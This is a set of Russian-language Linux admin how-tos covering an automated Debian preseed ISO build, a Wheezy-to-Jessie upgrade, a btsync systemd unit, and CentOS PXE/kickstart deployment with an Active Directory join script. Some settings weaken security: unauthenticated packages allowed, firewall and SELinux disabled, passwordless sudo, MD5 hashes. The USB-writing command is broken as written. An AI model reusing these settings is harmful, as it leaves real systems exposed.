Требовалось установить Debian с флешки или CD в полностью автоматическом режиме. Без доступа к Интернету. Софт- минимальный набор (Debian Jessie netinstall ISO). Архитектура - i686. После инсталляции необходимо установить дополнительные пакеты, произвести определенные настройки установленной ОС. Тоже в автоматическом режиме. Установку Debian'a можно полностью автоматизировать путем создания файла со сценарием ответов на все вопросы инсталлятора. Интегрировав данный сценарий в инсталляционный образ получим полностью самоустанавливаемый Debian. Способ автоматической установки называется Debian Preseed. Созданный файл-сценарий ответов (preseed.cfg) пакуется его в initrd инсталляционного ISO-образа Debian. На выходе получаем обычный ISO-образ, готовый к автоматической установке. Для создания собственного инсталляционного ISO-образа необходимо произвести ряд действий. А именно:
смонтировать оригинальный ISO;
"выудить" из него initrd, распаковать его;
скопировать в "корень" initrd созданный файл preseed.cfg и все необходимое для настройки устанавливаемой системы по завершении установки (см. ниже);
собрать обратно ISO образ. Для автоматизации сборки образа сделаем скрипт makeiso.sh. Выполнять его необходимо с правами рута. Для работы скрипта нужны установленные пакеты rsync, syslinux, genisoimage, md5sum. В директорию, где находится скрипт, необходимо скопировать оригинальный Debian ISO и файл-сценарий preseed.cfg. Также необходимо создать директорию extra - в ней будут находиться пост-инсталляционный скрипт и все необходимое, для его работы. cat makeiso.sh #!/bin/bash mkdir mnt mkdir irmod mkdir cd INISO=debian-8.3.0-i386-netinst.iso OUTISO=debian-preseed.iso mount -o loop $INISO mnt rsync -a -H --exclude=TRANS.TBL mnt/ cd umount mnt rmdir mnt # Pack custom initrd cd irmod gzip -d < ../cd/install.386/initrd.gz | cpio --extract --verbose --make-directories --no-absolute-filenames cp -f ../preseed.cfg preseed.cfg find . | cpio -H newc --create --verbose | gzip -9 > ../cd/install.386/initrd.gz cd ../ rm -fr irmod/ # Fix md5 sum cd cd md5sum `find -follow -type f` > md5sum.txt cd .. # Copy custom postinst script to new ISO cp -Rf extra cd/ # Create new ISO rm test.iso genisoimage -o $OUTISO -r -J -no-emul-boot -boot-load-size 4 -boot-info-table -b isolinux/isolinux.bin -c isolinux/boot.cat ./cd rm -rf cd isohybrid -o $OUTISO При успешной отработке скрипта получим образ debian-preseed.iso (в формате hybrid iso), готовый для записи как на USB-носитель, так и на CD. Записать образ на флешку можно, например, вот так: cat debian-preseed.iso /dev/sdX где sdХ - флешка Теперь, собственно, сам preseed-сценарий. cat preseed.cfg d-i debian-installer/locale string ru_RU.UTF8 d-i console-keymaps-at/keymap select ru ### Network configuration d-i netcfg/enable boolean false d-i netcfg/get_hostname string host_name d-i netcfg/get_domain string domain.name ### Mirror settings d-i mirror/country string enter information manually d-i mirror/http/hostname string http.us.debian.org d-i mirror/http/directory string /debian d-i mirror/http/proxy string ### Partitioning d-i partman-auto/method string regular d-i partman-auto/disk string /dev/sda d-i partman-auto/expert_recipe string \ boot-root:: \ 1000 10000 1000000 ext4 \ $primary{ } $bootable{ } \ method{ format } format{ } \ use_filesystem{ } filesystem{ ext4 } \ mountpoint{ / } \ label{root} \ \ 500 10000 1000000000 ext4 \ $primary{ } \ method{ format } format{ } \ use_filesystem{ } filesystem{ ext4 } \ mountpoint{ /var } \ \ 128 2048 150% linux-swap \ $primary{ } method{ swap } format{ } \ d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select Finish partitioning and write changes to disk d-i partman/confirm boolean true d-i clock-setup/utc boolean true d-i time/zone string Europe/Moscow ### Apt setup d-i apt-setup/non-free boolean true d-i apt-setup/contrib boolean true d-i apt-setup/use_mirror boolean false # Additional repositories, local[0-9] available d-i apt-setup/local0/repository string deb http://mirror.yandex.ru /debian jessie main d-i apt-setup/local0/source boolean true d-i apt-setup/local0/source string http://mirror.yandex.ru/debian jessie main d-i debian-installer/allow_unauthenticated string true ### Account setup d-i passwd/root-login boolean true d-i passwd/root-password-crypted password MD5_password_hash d-i passwd/make-user boolean true d-i passwd/user-fullname string user d-i passwd/username string user d-i passwd/user-password-crypted password MD5_password_hash ### Base system installation d-i base-installer/kernel/linux/initramfs-generators string yaird ### Boot loader installation d-i grub-installer/skip boolean false d-i lilo-installer/skip boolean true d-i grub-installer/bootdev string default d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true ### Package selection tasksel tasksel/first multiselect standard, ssh-server popularity-contest popularity-contest/participate boolean false ### Finishing up the first stage install d-i finish-install/reboot_in_progress note d-i preseed/late_command string cp -R /cdrom/extra/ /target/root/; \ cd /target; \ chmod +x /target/root/extra/postinst.sh; \ in-target /bin/bash /root/extra/postinst.sh; Пароль рута и пользователя задан в виде хеша. Хеш получаем командой: mkpasswd -m md5 Диск разбивается на 3 раздела: /, /var, и swap. ФС - ext4, Размер swap - не менее 128Мб, примерно 150% от объема установленной памяти. Остальные разделы - примерно пополам от объема диска. После окончания установки в свежеустановленную (т.н. "target") систему копируется директория extra и в chroot-окружении запускается постинсталляционный скрипт postinst.sh. Что ему делать - решать вам. Например, доустановить дополнительный софт, произвести донастройку системы и т.п. Все. Литература * How to modify an existing CD image to preseed d-i * Автоматическая установка с помощью списка ответов * Example preseed * Bug #712907 * HOWTO automate Debian installs with preseed

Обновление Debian Wheezy до Debian Jessie, не дожидаясь официального релиза (доп. ссылка 1) [комментарии]

До релиза Debian 8.0 (Jessie) остаются считанные недели, и за исключением некоторых блокирующих релиз ошибок, дистрибутив уже вполне пригоден для использовании на рабочей станции. Несмотря на то, что в Wheezy внесены кардинальные системные изменения, связанные с переходом на systemd, обновление с Wheezy проходит без заметных проблем. 1. Делаем резервную копию текущей системы. 2. Доводим Debian Wheezy до актуального состояния. # apt-get update # apt-get upgrade 3. Изучаем список не полностью установленных пакетов с состоянием Half-Installed или Failed-Config. # dpkg --audit 4. Изучаем список отложенных пакетов. # dpkg --get-selections | grep 'hold$' 5. Решаем выявленные на двух прошлых этапах проблемы, после чего удостоверимся, что в общем списке все пакеты имеют статус 'ii' в первой колонке. # dpkg -l| grep -v 'ii'| less 6. Удаляем забытые пакеты: # apt-get autoremove Подготовительная фаза завершена, приступаем к обновлению до Debian Jessie. 7. Изменяем список репозиториев в /etc/apt/sources.list. Вместо "wheezy" и "stable" указываем "jessie". # vi /etc/apt/sources.list deb http://ftp.ru.debian.org/debian/ jessie main deb http://security.debian.org/ jessie/updates main deb http://ftp.ru.debian.org/debian/ jessie-updates main deb http://ftp.ru.debian.org/debian/ jessie-backports main 8. Обновляем список доступных в Debian Jessie пакетов # apt-get update 9. Обновление производится в две стадии. На первой выполняется замена только пакетов, не приводящих к удалению или установке других пакетов. На второй выполняется полное обновление всех версий с учётом зависимостей. # apt-get upgrade # apt-get dist-upgrade В процессе выполнения dist-upgrade на экран будут выводиться запросы для принятия тех или иных решений о ходе обновления. Как правило, предлагаемый по умолчанию вариант оптимален. 10. Удаляем старые пакеты Wheezy. # apt-get autoremove

Запуск BitTorrent Sync в виде сервиса Systemd (доп. ссылка 1) [комментарии]

Создаём конфигурацию BitTorrent Sync: btsync --dump-sample-config и вносим необходимые изменения в /home/логин/.config/btsync/btsync.json Создаём unit-файл с описанием параметров сервиса для Systemd - /usr/lib/systemd/system/btsync.service [Unit] Description=BTSync After=network.target [Service] User=имя пользователя под которым будет запускаться BitTorrent Sync ExecStart=/usr/bin/btsync --config /home/логин/.config/btsync/btsync.json --nodaemon [Install] WantedBy=multi-user.target Активируем и запускаем сервис: systemctl enable btsync systemctl start btsync

Полуавтоматическое разворачивание рабочих станций CentOS в домене MS Active Directory Автор: Дмитрий Казаров [комментарии]

В заметке рассказывается о решении задачи по автоматизации установки новых Linux систем и организации управления ими с помощью Active Directory. Исходные данные:
Домен AD Domain.ru.
Дистрибутив CentOS, легально скачанный с сайта CentOS.org (у руководства сейчас пунктик о 100% легальности софта).
Очень странный софт спец назначения - 64-битный софт с 32-битным установщиком. Процесс организации установки Linux по сети 1. Готовим сервер установки. 1.1 На сервере виртуалок создаём сервер загрузок из того же CentOS-a с отдельным VLAN-ом и IP адресом 172.17.17.254/24 - основная сетка целиком на MS, лучше её не тревожить... Пока. Сразу ставим туда демоны dhcpd, tftp, nfs, ntpd. Машины заливать будем по NFS - так привычнее. 1.2 Настраиваем на виртуальном сервере DHCP под сетевую загрузку Linux. Правим /etc/dhcp/dhcpd.conf до примерно такого вида: option domain-name "centos"; option domain-name-servers 172.17.17.254; default-lease-time 600; max-lease-time 7200; authoritative; log-facility local7; subnet 172.17.17.0 netmask 255.255.255.0 { range 172.17.17.100 172.17.17.199; option routers 172.17.17.254; filename "pxelinux.0"; next-server 172.17.17.254; } В общем - всё как обычно, кроме пары ключевых параметров: filename и next-server. next-server задаёт IP-адрес tftp-сервера, а filename - файл в папке загрузочных файлов (см следующий пункт). включаем загрузку демона chkconfig dhcpd on и запускаем его service dhcpd start 1.3 Настраиваем tftp Правим файл /etc/xinetd.d/tftp. Точнее в строке disabled ставим значение "no" и в строке server_args ставим те значения, что нам привычны, или оставляем исходные, но запоминаем, куда они указывают. Мне, развлекающемуся с юнихами года так с 1989, привычнее там видеть "-s -vv /tftpboot", что собственно там и оказалось, после моих правок. Создаём саму папку для загрузочных файлов (/tftpboot - из параметра server_args): mkdir /tftpboot Ставим пакет syslinux-а yum install syslinux-4.02-7.el6.x86_64 И копируем PXE-шный загрузчкик в выбранное место: cp /usr/share/syslinux/pxelinux.0 /tftpboot И включаем демон: chkconfig xinetd on service xinetd restart 1.4 Настраиваем NFS Создаём папку для дистрибутива mkdir -p /pub/CentOS Распаковываем туда дистрибутив mkdir -p /mnt/cdrom mount -o loop /путь-к-папке-с-изошником-CentOS/CentOS-6.3-x86_64-bin-DVD1.iso /mnt/cdrom cd /pub/CentOS cp -ra /mnt/cdrom/* . umount /mnt/cdrom mount -o loop /путь-к-папке-с-изошником-CentOS/CentOS-6.3-x86_64-bin-DVD2.iso /mnt/cdrom cp -ra /mnt/cdrom/* . umount /mnt/cdrom Открываем к доступ к папке echo '/pub *(ro,insecure,all_squash)' >> /etc/exports chkconfig nfs on service nfs restart С общей подготовкой сервера - всё. Приступаем к специфичной части. 2. CentOS-овский загрузчик. CentOS, разумеется, для загрузки с CD и DVD использует загрузчик isolinux проекта Syslinux. А значит сделать файл конфигурации загрузки для pxelinux.0, другой загрузчик этого же проекта - не просто, а очень просто. Создаём папку /tftpboot/pxelinux.cfg и папку для дополнительных файлов загрузчика. mkdir -p /tftpboot/pxelinux.cfg Копируем туда под именем default файл конфигурации isolinux-а с дистрибутива CentOS... cd /pub/CentOS/isolinux/ cp isolinux.cfg /tftpboot/pxelinux.cfg/default [[/CODE]] ...и несколько файлов, используемых при загрузке. cp boot.cat boot.msg grub.conf initrd.img splash.jpg TRANS.TBL vesamenu.c32 vmlinuz /tftpboot Добавляем ссылку на файл автоматической инсталяции в параметры ядра. В строки append initrd=initrd.img надо дописать ks=nfs:172.17.17.254:/pub/CentOS-conf/desktop.cfg, где nfs - протокол, по которому надо брать файл конфигурации, 172.17.17.254 - адрес сервера, /pub/CentOS-conf/desktop.cfg - полное имя файла. Получается файл /tftpboot/pxelinux.cfg/default примерно такого вида: default vesamenu.c32 #prompt 1 timeout 80 display boot.msg menu background splash.jpg menu title Welcome to CentOS 6.3! menu color border 0 #ffffffff #00000000 menu color sel 7 #ffffffff #ff000000 menu color title 0 #ffffffff #00000000 menu color tabmsg 0 #ffffffff #00000000 menu color unsel 0 #ffffffff #00000000 menu color hotsel 0 #ff000000 #ffffffff menu color hotkey 7 #ffffffff #ff000000 menu color scrollbar 0 #ffffffff #00000000 label linux menu label ^Install or upgrade an existing system menu default kernel vmlinuz append initrd=initrd.img ks=nfs:172.17.17.254:/pub/CentOS-conf/desktop.cfg label vesa menu label Install system with ^basic video driver kernel vmlinuz append initrd=initrd.img xdriver=vesa nomodeset ks=nfs:172.17.17.254:/pub/CentOS-conf/desktop.cfg label rescue menu label ^Rescue installed system kernel vmlinuz append initrd=initrd.img rescue label local menu label Boot from ^local drive localboot 0xffff label memtest86 menu label ^Memory test kernel memtest append - 3. Проблема совместимости 64-битной ОС с 32-битными приложениями. При наличии 32-битных библиотек у 64-битной ОС ни каких проблем совместимости нет. Но вот не задача: новый yum теперь 32-битные библиотеки ставить не будет. Дело всё в параметре multilib_policy - в 5-ом CentOSе он имел значение all, теперь - best. Как правильно побороть это на этапе установки - не знаю. В Интернете нашёл, как побороть это по-быстрому (http://lists.centos.org/pipermail/centos/2011-July/114513.html). Вытаскиваем из архива файл yuminstall.py во временную папку mkdir /tmp/1 cd /tmp/1 rpm2cpio /pub/CentOS/Packages/anaconda-13.21.176-1.el6.centos.x86_64.rpm | cpio -id ./usr/lib/anaconda/yuminstall.py Добавляем строку multilib_policy=all после строки [main], где-то 1252 строка файла. Можно применить такой патчик: cd usr/lib/anaconda/ cat <<EOP > patch --- yuminstall.py.orig 2012-12-25 13:49:06.979604951 +0400 +++ yuminstall.py 2012-12-25 13:51:15.433740741 +0400 @@ -1250,6 +1250,7 @@ buf = """ [main] +multilib_policy=all installroot=%s cachedir=/var/cache/yum keepcache=0 EOP patch < patch Кладём подправленный файл в папку, откуда его точно заглотит инсталлятор: mkdir /pub/CentOS/RHupdates/ cp yuminstall.py /pub/CentOS/RHupdates/ 4. Создание конфигурации Kickstart. Теперь надо создать конфигурационный файл инсталлятора. Сделать это проще всего в графическом конфигураторе system-config-kickstart yum install system-config-kickstart system-config-kickstart Запускается простой Х-овый интерфейс выбора параметров. Заполняем его по своему усмотрению, ключевыми являются закладки "Метод установки" и "Сценарий после установки". Т.к. я изначально решил устанавливать по NFS в методе установки указываем "Выполнить новую установку", "Установочный носитель" - NFS, "Сервер NFS" - 172.17.17.254 и "Каталог NFS" - /pub/CentOS. Содержимое закладки "Сценарий после установки" можно скопировать из примера конфигурационного файла, приведённого ниже, между полями %post и %end. Пакеты выбираем по собственному вкусу, но для интеграции с Active Directory необходимы samba-winbind krb5-workstation openldap-clients их можно выбрать в "Выбор пакетов" -> "Базовая система" -> "Клиент каталогов". На всякий случай, мало ли на какой каталог придётся переползать, я ставлю вообще все пакеты этого подраздела. Сохраняем файл конфигурации /pub/CentOS-conf/desktop.cfg - именно на него ссылаются параметры ks из п.2. У меня файл /pub/CentOS-conf/desktop.cfg получился таким (он содержит комментарии на русском, их лучше удалить перед использованием - не хватало ещё глюков из-за кириллицы): #platform=x86, AMD64, or Intel EM64T #version=DEVEL # Firewall configuration - Внутри локалки firewall по большей части мешает. firewall --disabled # Install OS instead of upgrade install # Use NFS installation media nfs --server=172.17.17.254 --dir=/pub/CentOS # Root password rootpw --iscrypted <зашифрованный пароль> # System authorization information auth --useshadow --passalgo=md5 --enablecache # Use text mode install text # Run the Setup Agent on first boot firstboot --disable # System keyboard keyboard ru # System language lang ru_RU # SELinux configuration selinux --disabled # Installation logging level logging --level=info ## Turnoff power after installation # Удобно при большом кол-ве одновременно заливаемых компов - готовые выключены, # и хорошо заметно, который можно уносить. Кикстарт не понимает всей прелести такого # и этот параметр приходится дописывать руками. poweroff # System timezone timezone Europe/Moscow # Network information network --bootproto=dhcp --device=eth0 --onboot=on # System bootloader configuration bootloader --location=mbr # Clear the Master Boot Record zerombr # Partition clearing information clearpart --all --initlabel # Disk partitioning information. # диски на компьютерах сейчас просто огромные, место жалеть не приходится part /boot --fstype="ext4" --size=1024 part swap --fstype="swap" --recommended part / --fstype="ext4" --size=131072 part /home --fstype="ext4" --grow --size=1 # # А вот тут - самое основное # Скрипт выполняется после всех основных действий по установки, в том числе # после заливки софта, но chroot-нутым в подготовленную машину. # %post # Скрипт создаётся в папке /tmp настраиваемого компьютера. Незачем ему там храниться. rm -f $0 # Говорим yum-у и впредь ставить 32-битные модули вместе с 64-битными. sed -i '/main/a multilib_policy=all' /etc/yum.conf # Делаем группу wheels истинно админской, чтобы даже пароль не спрашивала при sudo [ -d /etc/sudoers.d ] || mkdir /etc/sudoers.d echo '%root ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers.d/rootgrp chmod 0440 /etc/sudoers.d/rootgrp assureFileFolder() { local d=`dirname $1`; [ -d "$d" ] && return mkdir -p "$d" } # Конфигурация переключения раскладок клавиатуры в KDE kxkbrcFile=/etc/skel/.kde/share/config/kxkbrc assureFileFolder ${kxkbrcFile} cat <<EOKXKBRC > ${kxkbrcFile} [Layout] DisplayNames=us,ru LayoutList=us,ru LayoutLoopCount=-1 Model=pc101 Options=grp_led:scroll,grp:caps_toggle,grp:alt_shift_toggle,grp:shifts_toggle ResetOldOptions=true ShowFlag=true ShowLabel=true ShowLayoutIndicator=true ShowSingle=true SwitchMode=Window Use=true EOKXKBRC # Конфигурация локали KDE kdeglobFile=/etc/skel/.kde/share/config/kdeglobals assureFileFolder ${kdeglobFile} cat <<EOKGL > ${kdeglobFile} [Locale] Country=ru DateFormat=%A %d %B %Y Language=ru EOKGL # Конфигурация правописания KDE. kdespellCfg=/etc/skel/.kde/share/config/sonnetrc assureFileFolder ${kdespellCfg} cat <<EOKSPL > ${kdespellCfg} [Spelling] backgroundCheckerEnabled=true checkUppercase=true defaultClient= defaultLanguage=ru ignore_ru= skipRunTogether=true EOKSPL # Конфигурация переключения раскладок клавиатуры в GNOME. # Индикатор раскладок автоматически запускается только с GNOME 2.30, # а текущий гном в дистрибутиве Центоса - 2.28... # Так, что надо либо добавить сюда запуск индикатора, либо настраивать это руками... # Но оба этих упражнения - в другой раз. gnomekbdbase='/etc/skel/.gconf' gnomekbdfile='desktop/gnome/peripherals/keyboard/kbd/%gconf.xml' gkd=`dirname "${gnomekbdfile}"` mkdir -p "${gnomekbdbase}/${gkd}" d="${gkd}"; while [ "x${d}" != "x." ]; do touch ${gnomekbdbase}/$d/'%gconf.xml'; d=`dirname $d`; done sed 's/ /\\t/g' <<EOGCONFKBD > ${gnomekbdbase}/${gnomekbdfile} <?xml version="1.0"?> <gconf> <entry name="options" mtime="1357150396" type="list" ltype="string">  <li type="string"> <stringvalue>grp_led grp_led:scroll</stringvalue> </li> <li type="string"> <stringvalue>grp grp:caps_toggle</stringvalue> </li> <li type="string"> <stringvalue>grp grp:alt_shift_toggle</stringvalue> </li> <li type="string"> <stringvalue>grp grp:shifts_toggle</stringvalue> </li> </entry> </gconf> EOGCONFKBD chmod 0644 ${kxkbrcFile} ${kdeglobFile} ${kdespellCfg} ${gnomekbdbase}/${gnomekbdfile} # Создаём учётные записи для великих гуру - пусть имеют возможность зайти на любой компьютер # Creation of admins for u in guru0 guru1; do useradd -m -p '*' -g wheel -G root $u mkdir /home/$u/.ssh touch /home/$u/.ssh/authorized_keys chown -R $u:wheel /home/$u/.ssh chmod -R go-rwx /home/$u/.ssh done # А сюда вставляем их публичные ключи SSH. cat <<EOAK0 >> /home/guru0/.ssh/authorized_keys EOAK0 cat <<EOAK1 >> /home/guru1/.ssh/authorized_keys EOAK1 # # У меня установка будет в текстовом режиме, а при этом система получает 3 уровень запуска - исправляем на 5-й. sed -i 's/id:[3-5]:initdefault:/id:5:initdefault:/g' /etc/inittab # Монтируем раздел с дистрибутивом mkdir /tmp/pubDnld mount -o ro 172.17.17.254:/pub /tmp/pubDnld # Ставим дополнительные пакеты. rpm -ivh /tmp/pubDnld/Adobe/adobe-release-x86_64-1.0-1.noarch.rpm rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux rpm -i /tmp/pubDnld/Adobe/flash-plugin-11.2.202.258-release.x86_64.rpm # Удаляем ненужные мне глобальные серверы времени и включаем себя как резервный сервер. # Список серверов времени будем получать по DHCP. sed -i.instbak '/^server /s/^/#/;/server[[:space:]]*127/s/^#//;/fudge[[:space:]]*127/s/^#//' /etc/ntp.conf echo 'NTPSERVERARGS=iburst' >> /etc/sysconfig/network # !!! А вот ради этого всё и затевается - ставим скрипт присоединения к домену cp /tmp/pubDnld/CentOS-conf/adsjoin /etc/init.d/ chmod a+x /etc/init.d/adsjoin # Включаем нужные сервисы и выключаем не нужные. chkconfig kdump off chkconfig ntpd on chkconfig adsjoin on %end # Мой список устанавлеваемых пакетов. Создан system-config-kickstart-ом. # %packages @additional-devel @backup-client @base @basic-desktop @cifs-file-server @client-mgmt-tools @console-internet @core @debugging @desktop-debugging @desktop-platform @desktop-platform-devel @development @directory-client @directory-server @eclipse @fonts @general-desktop @graphical-admin-tools @graphics @hardware-monitoring @input-methods @internet-applications @internet-browser @java-platform @kde-desktop @large-systems @legacy-unix @mysql @mysql-client @network-file-system-client @nfs-file-server @office-suite @performance @perl-runtime @php @print-client @remote-desktop-clients @ruby-runtime @russian-support @scientific @server-platform-devel @system-admin-tools @technical-writing @x11 ImageMagick SDL-devel cachefilesd cmake crypto-utils dcraw desktop-file-utils docbook-utils-pdf dump evolution-exchange expect expect gcc-java glade3 glibc-utils gnome-common gnome-devel-docs gnutls-devel gtk2-devel-docs hesinfo hplip hplip-gui i2c-tools icedtea-web inkscape kdebase-devel kdebase-workspace-devel kdegraphics-devel kdelibs-apidocs kdelibs-devel kdemultimedia-devel kdenetwork-devel kdepim-devel kdepimlibs-devel kdesdk kdesdk-devel krb5-appl-clients krb5-pkinit-openssl krb5-workstation ldapjdk libXau-devel libXaw-devel libXinerama-devel libXmu-devel libXpm-devel libXrandr-devel libbonobo-devel libreoffice-base libreoffice-emailmerge libreoffice-headless libreoffice-javafilter libreoffice-ogltrans libreoffice-presentation-minimizer libreoffice-report-builder libreoffice-wiki-publisher libudev-devel libusb-devel libuuid-devel libxslt-devel lm_sensors mc memtest86+ net-snmp-devel netpbm-progs nscd nss-pam-ldapd openldap-clients pam_krb5 pam_ldap perl-Test-Pod perl-Test-Pod-Coverage perl-suidperl pexpect php-mysql planner qt-doc rpmdevtools rpmlint ruby-irb samba samba-winbind screen sox startup-notification-devel systemtap-grapher taskjuggler texinfo tftp thunderbird xchat xfig xmlto-tex xmltoman xorg-x11-proto-devel xrestop xz-devel %end 5. Скрипт интеграции в Active Directory. Собственно, это то, ради чего писалась вся статья. Скрипт достаточно прост, предназначен для использования теми, кто знает, что такое Active Directory и имеет соответствующее звание - Ад-мин. Проверки входных данных есть, но очень слабые. Скрипт выполняет ряд важных действий:
Выполняет синхронизацию времени компьютера с доменом. Адреса NTP сервера(-ов) берутся из DHCP. Если синхронизация по чему либо не срабатывает - скрипт запрашивает адрес NTP сервера.
Запрашивает имя компьютера и домена.
Прописывает эти значения в файлах конфигурации Самбы, Цербера и Лдапа.
Запрашивает имя админа и авторизуется им в Цербере.
Присоединяет комп к Active Directory.
Выполняет ряд дополнительных настроек компьютера. Скрипт /pub/CentOS-conf/adsjoin #!/bin/bash # c#hkconfig: 345 98 1 ### BEGIN INIT INFO # Provides: adsjoin # Default-Start: 3 4 5 # Default-Stop: 0 1 2 6 # Required-Start: # Should-Start: $network # Short-Description: Requests ADS data and joins domain # Description: Asks user to enter ADS domain name, admin account and password. # Configures system to use ADS and joins it. ### END INIT INFO # Source function library. . /etc/init.d/functions FILENAME=/etc/sysconfig/adsjoin [ -z "$HOME" ] && export HOME=/ usage() { echo $"Usage: $0 {start|stop}" } prepareConfig() { # Fix system hostname fhn="${HOSTNAME,,}.${DOMAINNAME_FULL,,}" sed -i.adsjoinbak '/^HOSTNAME=/s/=.*/='$fhn'/' /etc/sysconfig/network hostname ${fhn} # add this name to work echo 127.0.0.1 ${fhn} ${fhn/.*} >> /etc/hosts cat <<EOSMB >> /etc/samba/smb.conf [global] winbind refresh tickets = true kerberos method = secrets and keytab EOSMB cat <<EOPWB >> /etc/security/pam_winbind.conf krb5_auth = yes cached_login = yes krb5_ccache_type = FILE EOPWB # --winbindtemplateprimarygroup=users \\ basedn=$(echo ${DOMAINNAME_FULL,,} | sed 's/^\\.*/dc=/;s/\\.*$//;s/\\.\\.*/,dc=/g') authconfig --update \\ --enablelocauthorize --enablecache \\ --enablekrb5realmdns --enablekrb5kdcdns \\ --ldapserver=ldap://${DOMAINNAME_FULL,,}/ --ldapbasedn=${basedn} \\ --enablemkhomedir --winbindtemplatehomedir=/home/%U --winbindtemplateshell=/bin/bash \\ --enablewinbindusedefaultdomain --enablewinbindauth --enablewinbind --enablewinbindoffline \\ --smbsecurity=ads --smbrealm=${DOMAINNAME_FULL} --smbworkgroup=${DOMAINNAME_SHORT} --smbservers='*' cat <<EOKRB > /etc/krb5.conf [logging] default = FILE:/var/log/krb5libs.log kdc = FILE:/var/log/krb5kdc.log admin_server = FILE:/var/log/kadmind.log [libdefaults] default_realm = ${DOMAINNAME_FULL} dns_lookup_realm = true dns_lookup_kdc = true ticket_lifetime = 24h renew_lifetime = 7d forwardable = true [domain_realm] .${DOMAINNAME_FULL,,} = ${DOMAINNAME_FULL} ${DOMAINNAME_FULL,,} = ${DOMAINNAME_FULL} EOKRB } askHostDom() { local hn dn while :; do read -p 'Enter HOSTNAME without domain: ' hn [ 0 -eq "$?" -a 4 -le ${#hn} -a ${#hn} -le 15 -a -z "$(expr "$hn" : '[a-zA-Z0-9-]*\$.*\$')" ] && break; echo "Wrong value ${hn}" echo "You have to specify HOSTNAME 4 to 15 chars long." echo "Only numbers, latin letter and '-' are allowed." done while :; do read -p 'Enter DOMAINNAME: ' dn [ 0 -eq "$?" -a 6 -le ${#dn} -a -z "$(expr "$dn" : '[.a-zA-Z0-9-]*\$.*\$')" ] && break; echo "Wrong value ${dn}" echo "You have to specify DOMAINNAME at least 6 chars long." echo "Only latin letter, numbers, '.' and '-' are allowed." done HOSTNAME="$hn" DOMAINNAME_FULL="${dn^^}" DOMAINNAME_SHORT=${DOMAINNAME_FULL/.*} } askOrgDir() { local od echo 'Enter Organizational directory where to create computer'\\''s account. Defaut is "Computers".' echo 'Example: Site/Unit/Computers' read -p 'Org. dir.: ' od ORG_DIRECTORY="$od" } askAdmAccount() { local un while :; do read -p "Enter Admin account of scpecified domain: " un [ 0 -eq "$?" -a 1 -lt ${#un} ] && break; echo "Wrong value ${un}" echo "You have to specify admin account at least 1 char long." done ADMINACCOUNT="$un" } case "$1" in start) if [ `/usr/bin/id -u` -ne 0 ]; then echo $"ERROR: Only root can run $0" exit 4 fi if [ ! -f /usr/bin/net ]; then echo $"ERROR: samba is not installed" exit 5 fi args="" if [ -f $FILENAME ] && [ ! -z "$(grep 'RUN_ADSJOIN=NO' $FILENAME)" ]; then exit 0 fi . /etc/profile.d/lang.sh /usr/bin/plymouth --hide-splash echo echo '========================================================' echo '============ Joining ADS' echo '========================================================' echo NTPSRVSRC='DHCP' NTPSRVS=$(sed -n 's/^server[[:space:]]*\$[^[:space:]]*\$.*/\\1/p' /etc/ntp.conf| grep -v '^127' | sort -u) while :; do if [ -n "$NTPSRVS" ] ; then if ntpdate -u -b $NTPSRVS then echo "Ok" break; else echo "Can not synchronize to $NTPSRVS" fi fi echo -e "WARNING!!!\\nNO working time servers specified by ${NTPSRVSRC}!" read -p 'Enter NTP server(s) of domain: ' NTPSRVS NTPSRVSRC=user done askHostDom echo prepareConfig echo service rsyslog restart /sbin/chkconfig winbind on RETVAL=255 HOME=/root LOGNAME=root USER=root export HOME LOGNAME USER cntr=3 while [ 0 -lt "$cntr" ]; do askAdmAccount if /usr/bin/kinit "${ADMINACCOUNT}"; then RETVAL=0; break; fi RETVAL=$? echo "Error loging in domain ${DOMAINNAME_FULL}" cntr=$(( $cntr - 1 )) done if [ "$RETVAL" -eq 0 ]; then cntr=3 while [ 0 -lt "$cntr" ]; do askOrgDir if [ -n "${ORG_DIRECTORY}" ]; then ADS_ORG="createcomputer='${ORG_DIRECTORY}'" else ADS_ORG="" fi ( eval "set -x; /usr/bin/net ads join -d 1 -k ${ADS_ORG}" ) 2>&1 | tee /tmp/net-ads-join-$$-$cntr # /usr/bin/net ads join -d 2 -k RETVAL=$? if [ "$RETVAL" -ne 0 ]; then echo "WARNING!!! Join failed" read -p 'Press Enter' else { /usr/bin/net -d 1 ads keytab create /sbin/service winbind restart /usr/bin/net -d 1 ads dns register } > /tmp/adsjoin-$$ 2>&1 break; fi cntr=$(( $cntr - 1 )) done fi /usr/bin/plymouth --show-splash # If adsjoin succeeded, chkconfig it off so we don't see the message # every time about starting up adsjoin. if [ "$RETVAL" -eq 0 ]; then action "" /bin/true else action "" /bin/false fi /sbin/chkconfig adsjoin off exit $RETVAL ;; stop) exit 0 ;; status) /sbin/chkconfig --list adsjoin | grep on >/dev/null RETVAL=$? if [ "$RETVAL" -eq 0 ]; then if [ ! -f $FILENAME ] || [ -z "$(grep 'RUN_ADSJOIN=NO' $FILENAME)" ]; then echo $"adsjoin is scheduled to run" else echo $"adsjoin is not scheduled to run" fi else echo $"adsjoin is not scheduled to run" fi exit 0 ;; restart | reload | force-reload | condrestart | try-restart) usage exit 3 ;; *) usage exit 2 ;; esac Примечание: Параметры "kerberos method" файла /etc/samba/smb.conf и "krb5_ccache_type" файла /etc/security/pam_winbind.conf должны соответствовать друг другу, иначе пользователь не сможет войти в систему. Как ни странно, синхронизация времени часто сбивается в первые секунды после получения адреса по dhcp - приходится вводить адреса серверов времени по нескольку раз. Скрипт перезапускает самбу и при его корректном завершении компьютер готов для работы без перезагрузки. 6. Запускаем компьютеры Подключаем к установочному VLAN-у коммутатор. Запасаемся веером патч-кордов, кабелей питания и пр. Подключаем сразу несколько компьютеров. Запускаем на каждом новом компьютере загрузку по сети, по протоколу PXE. У моих компьютеров сетевая загрузка была отключена, приходилось к каждому подключать монитор и клавиатуру и немного донастраивать BIOS. Но в итоге, параллельная подготовка компьютеров, включившая распаковку, заливку, введение в домен и упаковку для отправки в дальний офис занимала менее часа на десяток компьютеров, при том, что отдельный компьютер подготавливается около 15 минут. Что не добавлено 1. Если какие-либо системные утилиты, работающие под уч. записью root и понимающие, что такое Цербер, лезут к компьютерам домена, можно добавить в крон ежечасный вызов /usr/bin/net ads kerberos kinit -P - инициализация Церберного билета уч. записи компьютера. 2. Можно добавить клиенту DHCP скрипт само-регистрации в DNS: 